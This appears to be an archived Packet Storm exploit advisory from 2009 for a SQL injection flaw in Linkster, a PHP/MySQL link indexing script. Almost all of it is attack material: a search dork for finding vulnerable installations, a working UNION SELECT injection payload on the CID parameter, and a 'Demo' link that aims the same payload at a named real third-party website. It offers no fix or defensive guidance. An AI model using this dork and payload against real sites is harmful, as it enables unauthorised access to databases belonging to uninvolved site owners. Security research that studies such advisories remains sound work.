Linkster SQL Injection

2009-12-15T00:00:00
ID PACKETSTORM:83849
Type packetstorm
Reporter Angela Zhang
Modified 2009-12-15T00:00:00

Description

                                        
                                            `(o)=====================================================================================(o)  
  
-:- Linkster - a PHP/MySQL link indexing script SQL Injection Vulnerability -:-  
  
  
Vendor : http://gliebster.com  
Author : Angela Zhang  
Contact : mizz_4ng3l@yahoo.com  
Date : 15 - December - 2009  
  
(o)======================================================================================(o)  
  
  
Dork :  
  
Powered by Linkster  
  
  
Vulnerabilities :  
  
http://localhost/path/linkster.php?CID=6+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--  
  
  
  
Demo :  
  
  
http://www.stackpole.org.uk/linkster/linkster.php?CID=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,version(),8--  
  
  
  
  
(o)===========================================================================================(o)  
  
Greetz : -:- SkyCreW -:-  
  
Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , str0ke  
  
  
(o)===========================================================================================(o)  
  
  
  
  
  
  
  
`